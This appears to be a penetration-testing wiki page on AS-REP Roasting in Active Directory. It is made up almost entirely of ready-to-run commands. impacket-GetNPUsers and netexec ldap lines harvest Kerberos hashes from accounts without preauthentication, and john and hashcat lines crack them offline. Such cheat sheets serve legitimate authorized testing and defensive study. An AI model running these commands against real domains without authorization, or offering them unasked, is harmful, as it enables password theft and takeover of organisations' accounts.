AS-REP Roasting

AS-REP Roasting is a technique that retrieves password hashes that are not required Kerberos preauth in Active Directory.

Exploit

Lists users and passwords is not required Kerberos pre auth. Used for ASREPRoasting.

impacket-GetNPUsers example.local/<username>
impacket-GetNPUsers -dc-ip <target-ip> example.local/ -no-pass -usersfile users.txt
impacket-GetNPUsers -dc-ip <target-ip> example.local/<username> -no-pass -format hashcat 

# Without authenticatino
netexec ldap <target-ip> -u users.txt -p '' --asreproast output.txt
# With authentication
netexec ldap <target-ip> -u username -p password --asreproast output.txt
# With Kerberos authentication (-k)
netexec ldap <target-ip> -k --asreproast output.txt

If we find a password hash, crack it.

john --format=krb5asrep --wordlist=wordlist.txt hash.txt
# or
hashcat -m 18200 -a 0  hash.txt wordlist.txt

PreviousAD Exploit NextConstrained Delegation Attack

Last updated 1 month ago

hashtagExploit

Exploit